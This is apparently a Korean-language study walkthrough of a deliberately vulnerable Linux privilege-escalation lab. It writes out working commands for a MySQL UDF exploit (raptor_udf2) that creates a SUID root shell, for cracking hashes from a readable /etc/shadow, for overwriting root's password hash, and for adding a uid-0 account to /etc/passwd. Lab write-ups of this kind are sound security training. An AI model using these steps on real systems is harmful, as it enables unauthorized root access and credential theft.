Linux PrivEsc
#
`취약한 Debian VM 배포`
```
ssh user@MACHINE_IP
```
#
`서비스 익스플로잇`([MySQL CVE](https://www.exploit-db.com/exploits/1518))

다음 디렉토리로 이동한다.
```
cd /home/user/tools/mysql-udf
```
다음 명령어로 raptor_udf2.c 파일을 컴파일한다.
```
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
루트사용자로 MySQL 서버에 접속한다.
```
mysql -u root
```
MySQL 셸에서 다음 명령을 실행하여 컴파일된 익스플로잇을 사용하여 UDF(사용자 정의 함수) "do_system"을 생성해준다.
```
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
```
함수를 사용하여 /bin/bash를 /tmp/rootbash에 복사하고 SUID 권한을 설정한다.
```
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
```
MySQL 셸을 종료하고(exit 또는 \q 를 입력하고 Enter 키  를 누름 ) -p를 사용하여 /tmp/rootbash 실행 파일을 실행하여 루트 권한으로 실행되는 셸을 얻는다.
```
/tmp/rootbash -p
```
/tmp/rootbash 실행 파일을 제거하고 계속 진행하기 전에 루트 셸을 종료하는 것을 잊으면 안된다.
```
rm /tmp/rootbash
exit
```
#
`Weak File Permissions - Readable /etc/shadow`

`/etc/shadow` 파일에는 사용자 암호 해시가 포함되어 있으며 일반적으로 루트 사용자만 읽을 수 있다.

![image](https://user-images.githubusercontent.com/61821641/150008133-100ba7d0-9116-414c-98cf-644fe3778359.png)

TARGET_MACHINE의 /etc/shadow 파일은 누구나 읽을 수 있었다.
```
cat /etc/shadow
```
![image](https://user-images.githubusercontent.com/61821641/150008327-12184538-219a-4426-9043-26bcc6f4b649.png)

파일의 각 줄은 사용자를 나타낸다. 사용자의 암호해시는 각 줄의 첫번째와 두번째 콜론(:)사이에서 찾을 수 있다.

파일을 따로 Kali의 hash.txt 파일에 저장하고 `john the ripper`를 사용하여 크랙한다. 

![image](https://user-images.githubusercontent.com/61821641/150009044-821909e0-a249-4ce7-8b6f-0732f2b7bbb0.png)

해시 알고리즘은 sha512crypt를 사용한것으로 보인다.
크랙된 비밀번호(root/password123, user/password321)를 사용하여 루트 사용자로 전환한다.
#
`Weak File Permissions - Writable /etc/shadow`

TARGET_MACHINE에선 /etc/shadow 파일에 쓰기도 가능하다. 새 비밀번호 hash를 생성하여 /etc/shadow의 root 사용자 비밀번호를 수정한다.
```
mkpasswd -m sha-512 <newpasswordhere>
```
![image](https://user-images.githubusercontent.com/61821641/150010129-e059ad96-f1e6-4348-a610-1f74120e800e.png)
#
`Weak File Permissions - Writable /etc/passwd`

/etc/passwd 파일에는 사용자 계정에 대한 정보가 들어 있다. 일반적으로 루트 사용자만 쓸 수 있다. 오래전부터 /etc/passwd 파일에는 사용자 암호 해시가 포함되어 왔으며 일부 Linux 버전에서는 여전히 암호 해시를 거기에 저장할 수 있다. 

새 비밀번호 해시를 생성하고 /etc/passwd 파일에 계정을 추가하거나 비밀번호 해시를 수정해보자.
```
openssl passwd <newpasswordhere>
```

```
newroot:NsMPl8SV/b7.U:0:0:root:/root:/bin/bash
```

#
reference
- [Windows 권한 상승](https://github.com/sagishahar/lpeworkshop)
